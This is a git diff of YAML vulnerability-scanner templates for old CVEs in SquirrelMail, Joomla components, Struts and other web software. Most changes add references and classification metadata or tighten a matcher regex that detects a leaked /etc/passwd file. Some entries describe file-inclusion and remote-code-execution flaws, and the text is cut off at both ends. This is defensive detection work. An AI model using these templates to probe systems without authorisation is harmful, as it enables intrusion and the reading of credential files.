CVE-2002-1131 tags: xss,squirrelmail,cve,cve2002 requests: diff --git a/cves/2004/CVE-2004-0519.yaml b/cves/2004/CVE-2004-0519.yaml index 86da54f93e..cd4347e716 100644 --- a/cves/2004/CVE-2004-0519.yaml +++ b/cves/2004/CVE-2004-0519.yaml @@ -4,8 +4,15 @@ info: name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting author: dhiyaneshDk severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php." - reference: https://www.exploit-db.com/exploits/24068 + description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. + reference: + - https://www.exploit-db.com/exploits/24068 + - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc + - http://security.gentoo.org/glsa/glsa-200405-16.xml + - http://www.securityfocus.com/archive/1/361857 + remediation: Upgrade to the latest version. + classification: + cve-id: CVE-2004-0519 tags: xss,squirrelmail,cve2004,cve requests: @@ -28,3 +35,5 @@ requests: part: header words: - "text/html" + +# Enhanced by mp on 2022/01/27 diff --git a/cves/2005/CVE-2005-2428.yaml b/cves/2005/CVE-2005-2428.yaml index 061af2a832..9f7d76a8e0 100644 --- a/cves/2005/CVE-2005-2428.yaml +++ b/cves/2005/CVE-2005-2428.yaml @@ -1,13 +1,21 @@ id: CVE-2005-2428 + info: - name: CVE-2005-2428 + name: Lotus Domino R5 and R6 WebMail - Information Disclosure author: CasperGN severity: medium - tags: cve,cve2005 - description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696. + description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). reference: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - https://www.exploit-db.com/exploits/39495 + - https://nvd.nist.gov/vuln/detail/CVE-2005-2428 + remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2005-2428 + cwe-id: CWE-200 + tags: cve,cve2005,domino requests: - method: GET @@ -21,5 +29,7 @@ requests: - type: regex name: domino-username regex: - - '(Horde :: User Administration" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/18 diff --git a/cves/2005/CVE-2005-4385.yaml b/cves/2005/CVE-2005-4385.yaml index bf2da66428..a1b518dfcd 100644 --- a/cves/2005/CVE-2005-4385.yaml +++ b/cves/2005/CVE-2005-4385.yaml @@ -2,12 +2,16 @@ id: CVE-2005-4385 info: name: Cofax <= 2.0RC3 XSS + author: geeknik + severity: medium description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. reference: - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html - https://nvd.nist.gov/vuln/detail/CVE-2005-4385 - author: geeknik - severity: medium + - http://www.securityfocus.com/bid/15940 + - http://www.osvdb.org/21850 + classification: + cve-id: CVE-2005-4385 tags: cofax,xss,cve,cve2005 requests: diff --git a/cves/2006/CVE-2006-1681.yaml b/cves/2006/CVE-2006-1681.yaml index 31764515a9..56aacf1327 100644 --- a/cves/2006/CVE-2006-1681.yaml +++ b/cves/2006/CVE-2006-1681.yaml @@ -2,12 +2,16 @@ id: CVE-2006-1681 info: name: Cherokee HTTPD <=0.5 XSS + author: geeknik + severity: medium description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. reference: - https://www.securityfocus.com/bid/17408 - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 - author: geeknik - severity: medium + - http://secunia.com/advisories/19587 + - http://www.securityfocus.com/bid/17408 + classification: + cve-id: CVE-2006-1681 tags: cherokee,httpd,xss,cve,cve2006 requests: diff --git a/cves/2006/CVE-2006-2842.yaml b/cves/2006/CVE-2006-2842.yaml index 243a171e68..2c5e750191 100644 --- a/cves/2006/CVE-2006-2842.yaml +++ b/cves/2006/CVE-2006-2842.yaml @@ -4,8 +4,14 @@ info: name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion author: dhiyaneshDk severity: high - description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable." - reference: https://www.exploit-db.com/exploits/27948 + description: 'PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable.' + reference: + - https://www.exploit-db.com/exploits/27948 + - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE + - http://www.squirrelmail.org/security/issue/2006-06-01 + - http://secunia.com/advisories/20406 + classification: + cve-id: CVE-2006-2842 tags: cve2006,lfi,squirrelmail,cve requests: diff --git a/cves/2007/CVE-2007-0885.yaml b/cves/2007/CVE-2007-0885.yaml index b237557509..834637471b 100644 --- a/cves/2007/CVE-2007-0885.yaml +++ b/cves/2007/CVE-2007-0885.yaml @@ -2,10 +2,16 @@ id: CVE-2007-0885 info: name: Rainbow.Zen Jira XSS - description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. - reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded author: geeknik severity: medium + description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: + - https://www.securityfocus.com/archive/1/459590/100/0/threaded + - http://www.securityfocus.com/bid/22503 + - http://osvdb.org/33683 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 + classification: + cve-id: CVE-2007-0885 tags: cve,cve2007,jira,xss requests: diff --git a/cves/2007/CVE-2007-4504.yaml b/cves/2007/CVE-2007-4504.yaml index f9e0afd43d..9463b90ee5 100644 --- a/cves/2007/CVE-2007-4504.yaml +++ b/cves/2007/CVE-2007-4504.yaml @@ -1,13 +1,16 @@ id: CVE-2007-4504 info: - name: Joomla! Component RSfiles 1.0.2 - 'path' File Download + name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action. + description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. reference: - https://www.exploit-db.com/exploits/4307 - https://www.cvedetails.com/cve/CVE-2007-4504 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 + classification: + cve-id: CVE-2007-4504 tags: cve,cve2007,joomla,lfi requests: @@ -20,7 +23,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index 1a7b1450ed..7bae9bf531 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -1,11 +1,18 @@ id: CVE-2007-4556 info: - name: Apache Struts2 S2-001 RCE + name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution author: pikpikcu severity: critical - description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character. - reference: https://www.guildhab.top/?p=2326 + description: | + Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. + reference: + - https://www.guildhab.top/?p=2326 + - https://nvd.nist.gov/vuln/detail/CVE-2007-4556 + - https://cwiki.apache.org/confluence/display/WW/S2-001 + - http://forums.opensymphony.com/ann.jspa?annID=54 + classification: + cve-id: CVE-2007-4556 tags: cve,cve2007,apache,rce,struts requests: @@ -22,9 +29,11 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: - 200 + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2007/CVE-2007-5728.yaml b/cves/2007/CVE-2007-5728.yaml index 98c2548f6f..332f0e1357 100644 --- a/cves/2007/CVE-2007-5728.yaml +++ b/cves/2007/CVE-2007-5728.yaml @@ -5,10 +5,16 @@ info: author: dhiyaneshDK severity: medium description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865. - tags: cve,cve2007,xss,pgadmin - reference: https://www.exploit-db.com/exploits/30090 + reference: + - https://www.exploit-db.com/exploits/30090 + - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html + - http://www.securityfocus.com/bid/24182 + - http://secunia.com/advisories/25446 + classification: + cve-id: CVE-2007-5728 metadata: - shodan-query: 'http.title:"phpPgAdmin"' + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2007,xss,pgadmin,phppgadmin requests: - method: GET diff --git a/cves/2008/CVE-2008-2398.yaml b/cves/2008/CVE-2008-2398.yaml index 990afdc4ed..367edc8dbf 100644 --- a/cves/2008/CVE-2008-2398.yaml +++ b/cves/2008/CVE-2008-2398.yaml @@ -5,7 +5,13 @@ info: author: unstabl3 severity: medium description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. - reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 + reference: + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 + - http://www.securityfocus.com/bid/29291 + - http://secunia.com/advisories/30333 + - http://securityreason.com/securityalert/3896 + classification: + cve-id: CVE-2008-2398 tags: cve,cve2008,xss requests: @@ -26,4 +32,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index 56d8f91191..fd2721a6d5 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -1,12 +1,20 @@ id: CVE-2008-2650 -info: - name: CMSimple 3.1 - Local File Inclusion - author: pussycat0x - severity: high - description: | - Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. - reference: https://www.exploit-db.com/exploits/5700 - tags: cve,cve2008,lfi + +info: + name: CMSimple 3.1 - Local File Inclusion + author: pussycat0x + severity: high + description: | + Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. + reference: + - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17 + - http://www.securityfocus.com/bid/29450 + - http://secunia.com/advisories/30463 + - http://osvdb.org/45881 + classification: + cve-id: CVE-2008-2650 + tags: cve,cve2008,lfi + requests: - raw: - | diff --git a/cves/2008/CVE-2008-4668.yaml b/cves/2008/CVE-2008-4668.yaml index ab38886489..d14e0a3b1e 100644 --- a/cves/2008/CVE-2008-4668.yaml +++ b/cves/2008/CVE-2008-4668.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/6618 - https://www.cvedetails.com/cve/CVE-2008-4668 + - http://www.securityfocus.com/bid/31458 + - http://securityreason.com/securityalert/4464 + classification: + cve-id: CVE-2008-4668 tags: cve,cve2008,joomla,lfi requests: @@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2008/CVE-2008-4764.yaml b/cves/2008/CVE-2008-4764.yaml index 309174ce27..0b0db9bff6 100644 --- a/cves/2008/CVE-2008-4764.yaml +++ b/cves/2008/CVE-2008-4764.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/5435 - https://www.cvedetails.com/cve/CVE-2008-4764 + - http://www.securityfocus.com/bid/28764 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873 + classification: + cve-id: CVE-2008-4764 tags: cve,cve2008,joomla,lfi requests: @@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2008/CVE-2008-5587.yaml b/cves/2008/CVE-2008-5587.yaml index 6045940b95..6dae0ebe25 100644 --- a/cves/2008/CVE-2008-5587.yaml +++ b/cves/2008/CVE-2008-5587.yaml @@ -4,11 +4,17 @@ info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - tags: cve2008,lfi,phppgadmin + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - http://www.securityfocus.com/bid/32670 + - http://secunia.com/advisories/33014 + - http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." + shodan-query: http.title:"phpPgAdmin" + tags: cve2008,lfi,phppgadmin requests: - method: GET diff --git a/cves/2008/CVE-2008-6080.yaml b/cves/2008/CVE-2008-6080.yaml index d326f80636..7ce462f492 100644 --- a/cves/2008/CVE-2008-6080.yaml +++ b/cves/2008/CVE-2008-6080.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/6809 - https://www.cvedetails.com/cve/CVE-2008-6080 + - http://secunia.com/advisories/32377 + - http://www.securityfocus.com/bid/31877 + classification: + cve-id: CVE-2008-6080 tags: cve,cve2008,joomla,lfi requests: @@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2008/CVE-2008-6172.yaml b/cves/2008/CVE-2008-6172.yaml index 8d57e5e23a..d63bd5c944 100644 --- a/cves/2008/CVE-2008-6172.yaml +++ b/cves/2008/CVE-2008-6172.yaml @@ -4,10 +4,14 @@ info: name: Joomla! Component RWCards 3.0.11 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. + description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. reference: - https://www.exploit-db.com/exploits/6817 - https://www.cvedetails.com/cve/CVE-2008-6172 + - http://secunia.com/advisories/32367 + - http://www.securityfocus.com/bid/31892 + classification: + cve-id: CVE-2008-6172 tags: cve,cve2008,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2008/CVE-2008-6222.yaml b/cves/2008/CVE-2008-6222.yaml index 6cb7474f10..c52d791b69 100644 --- a/cves/2008/CVE-2008-6222.yaml +++ b/cves/2008/CVE-2008-6222.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/6980 - https://www.cvedetails.com/cve/CVE-2008-6222 + - http://secunia.com/advisories/32523 + - http://www.securityfocus.com/bid/32113 + classification: + cve-id: CVE-2008-6222 tags: cve,cve2008,joomla,lfi requests: @@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2008/CVE-2008-6668.yaml b/cves/2008/CVE-2008-6668.yaml index f034e02349..797fedd504 100644 --- a/cves/2008/CVE-2008-6668.yaml +++ b/cves/2008/CVE-2008-6668.yaml @@ -2,13 +2,17 @@ id: CVE-2008-6668 info: name: nweb2fax <= 0.2.7 Directory Traversal + author: geeknik + severity: high description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php. reference: - https://www.exploit-db.com/exploits/5856 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 - author: geeknik - severity: high - tags: nweb2fax,lfi,cve,cve2008 + - http://www.securityfocus.com/bid/29804 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 + classification: + cve-id: CVE-2008-6668 + tags: nweb2fax,lfi,cve,cve2008,traversal requests: - method: GET diff --git a/cves/2009/CVE-2009-0545.yaml b/cves/2009/CVE-2009-0545.yaml index 640fdf985f..8201ec2932 100644 --- a/cves/2009/CVE-2009-0545.yaml +++ b/cves/2009/CVE-2009-0545.yaml @@ -3,9 +3,15 @@ id: CVE-2009-0545 info: name: ZeroShell <= 1.0beta11 Remote Code Execution author: geeknik - description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. - reference: https://www.exploit-db.com/exploits/8023 severity: critical + description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. + reference: + - https://www.exploit-db.com/exploits/8023 + - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 + - http://www.zeroshell.net/eng/announcements/ + - http://www.ikkisoft.com/stuff/LC-2009-01.txt + classification: + cve-id: CVE-2009-0545 tags: cve,cve2009,zeroshell,kerbynet,rce requests: @@ -18,3 +24,5 @@ requests: part: body regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/04/18 diff --git a/cves/2009/CVE-2009-0932.yaml b/cves/2009/CVE-2009-0932.yaml index 20514f9861..c8fbea6440 100644 --- a/cves/2009/CVE-2009-0932.yaml +++ b/cves/2009/CVE-2009-0932.yaml @@ -4,12 +4,15 @@ info: name: Horde - Horde_Image::factory driver Argument LFI author: pikpikcu severity: high - description: | - Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. + description: Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. reference: - https://www.exploit-db.com/exploits/16154 - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2 - tags: cve,cve2009,horde,lfi + - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5 + - http://secunia.com/advisories/33695 + classification: + cve-id: CVE-2009-0932 + tags: cve,cve2009,horde,lfi,traversal requests: - method: GET @@ -21,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index 36ff315c20..d614f881cd 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 + - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301 + - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php + classification: + cve-id: CVE-2009-1151 tags: cve,cve2009,phpmyadmin,rce,deserialization requests: diff --git a/cves/2009/CVE-2009-1496.yaml b/cves/2009/CVE-2009-1496.yaml index b915fc3ad0..96796ca27b 100644 --- a/cves/2009/CVE-2009-1496.yaml +++ b/cves/2009/CVE-2009-1496.yaml @@ -8,6 +8,9 @@ info: reference: - https://www.exploit-db.com/exploits/8367 - https://www.cvedetails.com/cve/CVE-2009-1496 + - http://www.securityfocus.com/bid/34431 + classification: + cve-id: CVE-2009-1496 tags: cve,cve2009,joomla,lfi requests: @@ -20,7 +23,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml index 9141371d04..c70f6219f8 100644 --- a/cves/2009/CVE-2009-1558.yaml +++ b/cves/2009/CVE-2009-1558.yaml @@ -5,8 +5,14 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. - reference: https://www.exploit-db.com/exploits/32954 - tags: cve,cve2009,iot,lfi + reference: + - https://www.exploit-db.com/exploits/32954 + - http://www.securityfocus.com/bid/34713 + - http://www.vupen.com/english/advisories/2009/1173 + - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ + classification: + cve-id: CVE-2009-1558 + tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal requests: - method: GET @@ -17,7 +23,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2009/CVE-2009-1872.yaml b/cves/2009/CVE-2009-1872.yaml index 2020a26398..2d24e45838 100644 --- a/cves/2009/CVE-2009-1872.yaml +++ b/cves/2009/CVE-2009-1872.yaml @@ -8,6 +8,13 @@ info: reference: - https://www.securityfocus.com/archive/1/505803/100/0/threaded - https://www.tenable.com/cve/CVE-2009-1872 + - http://www.adobe.com/support/security/bulletins/apsb09-12.html + - http://www.dsecrg.com/pages/vul/show.php?id=122 + classification: + cve-id: CVE-2009-1872 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + verified: "true" tags: cve,cve2009,adobe,xss,coldfusion requests: diff --git a/cves/2009/CVE-2009-2015.yaml b/cves/2009/CVE-2009-2015.yaml index 372820389d..3900e491b5 100644 --- a/cves/2009/CVE-2009-2015.yaml +++ b/cves/2009/CVE-2009-2015.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/8898 - https://www.cvedetails.com/cve/CVE-2009-2015 + - http://www.securityfocus.com/bid/35259 + - http://www.vupen.com/english/advisories/2009/1530 + classification: + cve-id: CVE-2009-2015 tags: cve,cve2009,joomla,lfi requests: @@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2009/CVE-2009-2100.yaml b/cves/2009/CVE-2009-2100.yaml index db846d97e7..0b560673c6 100644 --- a/cves/2009/CVE-2009-2100.yaml +++ b/cves/2009/CVE-2009-2100.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/8946 - https://www.cvedetails.com/cve/CVE-2009-2100 + - http://www.securityfocus.com/bid/35378 + - http://osvdb.org/55176 + classification: + cve-id: CVE-2009-2100 tags: cve,cve2009,joomla,lfi requests: @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-3053.yaml b/cves/2009/CVE-2009-3053.yaml index 3a0a3a1739..7377bc684f 100644 --- a/cves/2009/CVE-2009-3053.yaml +++ b/cves/2009/CVE-2009-3053.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/9564 - https://www.cvedetails.com/cve/CVE-2009-3053 + - http://www.securityfocus.com/bid/36207 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 + classification: + cve-id: CVE-2009-3053 tags: cve,cve2009,joomla,lfi requests: @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-3318.yaml b/cves/2009/CVE-2009-3318.yaml index 957a9932a2..2e1f8c8283 100644 --- a/cves/2009/CVE-2009-3318.yaml +++ b/cves/2009/CVE-2009-3318.yaml @@ -8,6 +8,9 @@ info: reference: - https://www.exploit-db.com/exploits/9706 - https://www.cvedetails.com/cve/CVE-2009-3318 + - http://www.securityfocus.com/bid/36441 + classification: + cve-id: CVE-2009-3318 tags: cve,cve2009,joomla,lfi requests: @@ -20,8 +23,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-4202.yaml b/cves/2009/CVE-2009-4202.yaml index 33b3f6694d..95e235cf67 100644 --- a/cves/2009/CVE-2009-4202.yaml +++ b/cves/2009/CVE-2009-4202.yaml @@ -8,7 +8,11 @@ info: reference: - https://www.exploit-db.com/exploits/8870 - https://www.cvedetails.com/cve/CVE-2009-4202 - tags: cve,cve2009,joomla,lfi + - http://www.vupen.com/english/advisories/2009/1494 + - http://www.securityfocus.com/bid/35201 + classification: + cve-id: CVE-2009-4202 + tags: cve,cve2009,joomla,lfi,photo requests: - method: GET @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-4223.yaml b/cves/2009/CVE-2009-4223.yaml index c28fd9c671..f6cfc51ae8 100644 --- a/cves/2009/CVE-2009-4223.yaml +++ b/cves/2009/CVE-2009-4223.yaml @@ -2,12 +2,16 @@ id: CVE-2009-4223 info: name: KR-Web <= 1.1b2 RFI + author: geeknik + severity: high description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. reference: - https://sourceforge.net/projects/krw/ - https://www.exploit-db.com/exploits/10216 - author: geeknik - severity: high + - https://exchange.xforce.ibmcloud.com/vulnerabilities/54395 + - http://www.exploit-db.com/exploits/10216 + classification: + cve-id: CVE-2009-4223 tags: cve,cve2009,krweb,rfi requests: diff --git a/cves/2009/CVE-2009-4679.yaml b/cves/2009/CVE-2009-4679.yaml index 10596c502d..5f63aae9d3 100644 --- a/cves/2009/CVE-2009-4679.yaml +++ b/cves/2009/CVE-2009-4679.yaml @@ -5,10 +5,14 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/33440 - https://www.cvedetails.com/cve/CVE-2009-4679 - tags: cve,cve2009,joomla,lfi + - http://secunia.com/advisories/37760 + - http://www.osvdb.org/61382 + classification: + cve-id: CVE-2009-4679 + tags: cve,cve2009,joomla,lfi,nexus requests: - method: GET @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml new file mode 100644 index 0000000000..53060c8ed3 